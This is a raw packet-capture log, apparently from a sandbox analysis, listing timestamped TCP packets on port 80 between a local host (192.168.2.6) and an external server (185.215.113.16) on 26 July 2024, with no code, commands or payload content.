Jul 26, 2024 12:57:06.597990990 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598010063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598025084 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598033905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598054886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598063946 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598376989 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598398924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598421097 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598423958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598434925 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598443031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598455906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598464966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.598478079 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.598499060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612271070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612351894 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612402916 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612428904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612447977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612453938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612459898 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612474918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612521887 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612521887 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612528086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612551928 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.612562895 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.612587929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613214970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613266945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613327026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613347054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613454103 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613454103 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613514900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613532066 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613559008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613560915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613569021 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613599062 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613908052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613929033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613955021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613959074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613970041 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613976955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.613986969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.613997936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614016056 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614022970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614032984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614046097 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614062071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614083052 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614690065 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614713907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614733934 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614741087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614757061 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614763021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614778996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614785910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614795923 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614806890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614824057 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614826918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614850044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.614850998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614877939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.614900112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615236998 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615250111 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615278006 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615284920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615293980 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615302086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615314007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615323067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615344048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615345955 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615367889 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615376949 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615797043 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615817070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615842104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615845919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615858078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615864038 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615885019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615890980 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615907907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615922928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615930080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615942001 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615951061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.615972996 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.615977049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.616014004 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.616204977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.616940975 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.616966009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.616985083 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.616988897 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617005110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617010117 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617012024 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617029905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617048979 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617054939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617059946 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617073059 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617094040 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617099047 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617104053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617113113 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617135048 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617140055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617166042 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617175102 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617893934 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617917061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617937088 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617937088 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617959023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617963076 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617979050 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.617981911 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.617999077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618005991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618026018 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618027925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618048906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618051052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618061066 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618072987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618083000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618104935 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618514061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618536949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618554115 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618561029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618580103 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618581057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618587971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618608952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618619919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618633032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618645906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618654966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618676901 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618680000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618697882 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618700981 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618721008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.618722916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618747950 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.618773937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.628340960 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.628520966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.628540993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.628556013 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.628567934 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.628592014 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.628592014 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.628603935 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.629014015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.629040003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.629062891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.629152060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.629152060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.629152060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.686508894 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.686546087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.686569929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.686718941 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.686718941 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.686718941 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.686866045 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.686908007 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.686930895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.686958075 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.687026024 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.687026978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.687026978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.687026978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689008951 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689062119 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689071894 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689089060 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689120054 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689120054 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689310074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689331055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689357042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689358950 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689369917 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689377069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689404011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689404011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.689961910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.689981937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690006018 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690009117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690009117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690025091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690047026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690048933 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690056086 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690071106 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690083981 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690093040 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690104961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690126896 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690485001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690510035 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690522909 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690531015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690546036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690553904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690563917 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690577984 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690587997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690602064 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690613031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690624952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.690633059 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.690660000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.691148996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.691169024 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.691193104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.691193104 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.691201925 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.691215992 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.691229105 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.691239119 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.691250086 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.691273928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:07.491637945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:07.491789103 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:07.503601074 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:07.503887892 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:07.503887892 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:07.504870892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:07.505124092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:07.509293079 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.251503944 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.251724958 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.253158092 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.258095026 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494115114 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494261026 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494312048 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494333982 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494352102 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494359970 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494378090 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494385958 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494398117 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494415045 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494425058 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494443893 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494455099 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494473934 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494484901 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494513035 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494782925 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494803905 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494827986 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.494836092 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494858027 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.494883060 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.499777079 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.499806881 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.499830008 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.499852896 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.644989014 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645010948 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645030022 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645119905 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.645178080 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.645378113 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645389080 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645410061 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645452023 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.645495892 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.645561934 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645607948 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.645668983 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.645725965 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.645993948 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646065950 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646073103 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646084070 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646125078 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646146059 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646222115 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646275997 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646368980 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646423101 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646429062 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646442890 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646467924 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646498919 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646617889 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646668911 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646827936 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646879911 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646912098 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646922112 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.646955013 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.646976948 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.647521019 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.647583008 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.647645950 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.647656918 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.647697926 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.647829056 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.647840977 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.647886992 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.647931099 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.649923086 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.650001049 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.793448925 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793483019 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793509960 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793529034 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793554068 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793570042 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.793592930 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793616056 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793641090 CEST	60779	80	192.168.2.6	185.215.113.16
